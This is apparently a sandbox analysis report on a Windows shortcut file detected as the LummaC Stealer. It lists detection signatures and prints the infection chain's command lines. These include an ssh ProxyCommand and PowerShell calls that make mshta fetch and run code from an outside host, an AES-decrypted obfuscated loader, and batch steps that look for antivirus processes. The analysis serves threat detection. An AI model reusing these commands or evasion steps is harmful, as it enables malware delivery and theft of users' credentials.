Edit tour
Windows
Analysis Report
JSWunwO4rS.lnk
Overview
General Information
Sample name: | JSWunwO4rS.lnkrenamed because original name is a hash value |
Original sample name: | 624101f6b4285e2425c8851c2350d787.lnk |
Analysis ID: | 1570112 |
MD5: | 624101f6b4285e2425c8851c2350d787 |
SHA1: | bd1c79428041143f49cb695cd947f4448540d5c9 |
SHA256: | cb99077ec6936521cec13989456a3d87a275fb2a3508f67b624805bba5d26ef3 |
Tags: | lnkuser-abuse_ch |
Infos: | |
Detection
LummaC Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LummaC Stealer
AI detected suspicious sample
Drops PE files with a suspicious file extension
Machine Learning detection for sample
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Lolbin Ssh.exe Use As Proxy
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- ssh.exe (PID: 2780 cmdline:
"C:\Window s\System32 \OpenSSH\s sh.exe" -o ProxyComm and="power shell powe rshell -Co mmand ('ms hta.e]]]]] ]]x]]]]]]e ]]]]] ]]]] ]h]]]]]t]] ]]]]tp]]]] ]s://]]]]] ws]]]]]]er ]]]]]]d]]] ]]]tf]]]]] y]]]]]]guh ]]]]]]]i]] ]]]]j]]]]] ]].2024]]] ]]]-vi]]]] ]ptic]]]]] ke]]]]]t.c om]]]]]]]/ ]]]]]k.m]] ]]]]]p]]]] ]4' -repla ce ']')" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC) - conhost.exe (PID: 2364 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6660 cmdline:
powershell powershel l -Command ('mshta.e ]]]]]]]x]] ]]]]e]]]]] ]]]]]h]]] ]]t]]]]]]t p]]]]]s:// ]]]]]ws]]] ]]]er]]]]] ]d]]]]]]tf ]]]]]y]]]] ]]guh]]]]] ]]i]]]]]]j ]]]]]]].20 24]]]]]]-v i]]]]]ptic ]]]]]ke]]] ]]t.com]]] ]]]]/]]]]] k.m]]]]]]] p]]]]]4' - replace '] ') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 7160 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " mshta.exe https://ws erdtfyguhi j.2024-vip ticket.com /k.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9) - mshta.exe (PID: 1088 cmdline:
"C:\Window s\system32 \mshta.exe " https:// wserdtfygu hij.2024-v ipticket.c om/k.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 7056 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction AvOq ($fZZic){r eturn -spl it ($fZZic -replace '..', '0x$ & ')};$QtE Xr = AvOq( 'F71849245 068CFBDCED 10C084C612 5F88EBB766 A68F42618A 519AD0E0FA 55DFA41BBC 0220A7CFC0 548D5F0C8E CED91F3F0F 6D99831685 FEF33B4DEC 446D39844D A6ABF150BB 86E32B97BC E9734DD737 10688BF213 151B34198A 7EB6F4BF33 44166A3DED C1DACA37BE 736FB658BE 94E1342E67 71A99C5C4C 7F81C8B6C9 B6279B8D38 EAA5AFE041 4C8F15D230 80FCB04B45 D8EBA74D63 6519B83900 11F025A39B C7700FA068 1CE70921F7 F651441D96 09F8C8EAEF 66688D0AFF 54CD9E186A 5012925441 5DC02D5A4B FE23D7079F 563D2111FC 83B360CA65 2CBD54EEA2 8CDF41EB42 7FD920B0D5 20462D045D 63090F9624 D6DA5E3EF4 FFA2577280 9F96603764 73448FC63D F83E3272E1 791618E1D0 EA5E9D4C40 BA1AA89AAE 6699A4098C 7EE64ECCD6 2783C1B7D8 650592C33F 1372AC3509 BC676C043F D52F1C6FBB C2010B7134 5705C84085 A96E37CD2B 12961AAEEE 9DB058ADEF 8828940F89 3309ACF84F 8CF8015178 D50FF22382 C7405F48E9 1FA3129017 B7EC4B284C 242676968C 97CD62FD08 08CB85A7AC 9F62C36CC1 7E1A4E6D6F 0E16CD5973 6713C4F464 A5A3A59674 51878F4B8F 13CEC3CBC0 42CE205E16 28C1D90AD8 D743AACF33 6047808434 59139D4687 7D6B42A0FC 19145594EF FEC326A1A0 B6326112C4 CE5BC279B2 6783822F68 EB2AF9ADAD E16BA3D008 EEAAB4BF10 BA18BA6037 C1AFFD5DB8 F63AD7ED00 193207AA01 009443C0AB 2F530D5843 24A1F1D66E D86AD2E61D DF459BCAD3 FD5E17C8E7 8565373008 94C18877F3 B57C14639B D9781F101D 0005E813E7 1F05721A4E A8B0D052A4 54533A555B 8785235E94 6B52D496FB 71DE15C7BB 50F3DCDA38 5BA2EC195C 6AA39504F0 78B7F5295E 4814F28C62 055EC0AC8B 78A04219E9 6C739CBED3 6806D07483 76E6BE81C5 8A52AC85EB 33543CE5AE AB7709978E F4CDA0021C BDA1CB44E4 400FEF05CA 556B0A2E93 9F422041C9 BFFF163989 0CF6863788 8D4ED48E4' );$AqvND=- join [char []](([Secu rity.Crypt ography.Ae s]::Create ()).Create Decryptor( (AvOq('516 866484F6B6 B4270524E6 6557A6F4C' )),[byte[] ]::new(16) ).Transfor mFinalBloc k($QtEXr,0 ,$QtEXr.Le ngth)); & $AqvND.Sub string(0,3 ) $AqvND.S ubstring(2 53) MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 940 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - IntroductoryTunes.exe (PID: 3924 cmdline:
"C:\Users\ user\AppDa ta\Roaming \Introduct oryTunes.e xe" MD5: 12B325F869EA3948FD7ADDBCD59AAC1C) - cmd.exe (PID: 5356 cmdline:
"C:\Window s\System32 \cmd.exe" /c copy En velope Env elope.cmd && Envelop e.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5948 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7184 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 7192 cmdline:
findstr /I "wrsa ops svc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - tasklist.exe (PID: 7228 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 7236 cmdline:
findstr "A vastUI AVG UI bdservi cehost nsW scSvc ekrn SophosHea lth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 7276 cmdline:
cmd /c md 136140 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - findstr.exe (PID: 7292 cmdline:
findstr /V "DEALERPI CRESPONDED COURAGEPRE REQUISITEO LYMPUSDIAG RAMENGAGED " Sunny MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 7304 cmdline:
cmd /c cop y /b ..\St eady + ..\ Ts + ..\Un necessary + ..\Minut es + ..\Si lk + ..\Co ntents + . .\Global d MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - Concerts.com (PID: 7320 cmdline:
Concerts.c om d MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11) - choice.exe (PID: 7336 cmdline:
choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
- svchost.exe (PID: 6768 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Michael Haag: |